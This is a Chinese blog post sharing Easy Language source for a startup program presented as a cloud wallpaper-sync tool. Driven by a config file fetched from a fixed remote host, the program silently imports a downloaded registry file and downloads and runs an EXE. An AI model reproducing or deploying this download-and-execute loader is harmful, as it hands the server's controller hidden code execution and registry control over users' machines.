最新消息:网站域名已更换为 WWW.LAOLIIT.CN 原071058.COM域名另做它用

原创-云端同步壁纸.注册表.程序运行易语言源码

原创 13635781444 585浏览

具体功能就是:
更具云端配置文件确定是否替换本地壁纸,是否导入注册表文件,是否下载EXE文件并执行
代码共享出来
易语言开发的需要的拿去 不再更新了

.版本 2
.支持库 internet
.支持库 spec
.支持库 eAPI

.程序集 窗口程序集_启动窗口
.程序集变量 配置文件下载, 字节集
.程序集变量 读配置文件, 文本型
.程序集变量 指定文件下载, 字节集
.程序集变量 读jpg, 文本型
.程序集变量 读exe, 文本型
.程序集变量 读reg, 文本型

.子程序 __启动窗口_创建完毕

配置文件下载 = HTTP读文件 (“http://www.2358t.com/” + “071058” + “/071058.ini”)
调试输出 (到文本 (配置文件下载))

写到文件 (取运行目录 () + “\071058.ini”, 配置文件下载)
‘ ================================下载壁纸================================
读jpg = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “bz”, )
读配置文件 = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “bzrun”, )
.如果 (读配置文件 = “1”)
指定文件下载 = HTTP读文件 (读jpg)
写到文件 (取运行目录 () + “\071058.jpg”, 指定文件下载)
设置桌面墙纸 (取运行目录 () + “\071058.jpg”, 2)
.否则

.如果结束

‘ ================================下载壁纸================================

‘ ================================下载注册表================================
读reg = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “reg”, )
读配置文件 = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “regrun”, )
.如果 (读配置文件 = “1”)
指定文件下载 = HTTP读文件 (读reg)
写到文件 (取运行目录 () + “\071058.reg”, 指定文件下载)
运行 (“regedit /s ” + 取运行目录 () + “\071058.reg”, 真, #隐藏窗口)
.否则

.如果结束

‘ ================================下载注册表================================

‘ ================================下载程序================================

读exe = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “exe”, )
读配置文件 = 读配置项 (取运行目录 () + “\071058.ini”, “lizhi”, “exerun”, )
.如果 (读配置文件 = “1”)
指定文件下载 = HTTP读文件 (读exe)
写到文件 (取运行目录 () + “\071058.exe”, 指定文件下载)
运行 (取运行目录 () + “\071058.exe”, 假, )
.否则

.如果结束
删除文件 (取运行目录 () + “\071058.ini”)

转载请注明:网管老李-举手二号 » 原创-云端同步壁纸.注册表.程序运行易语言源码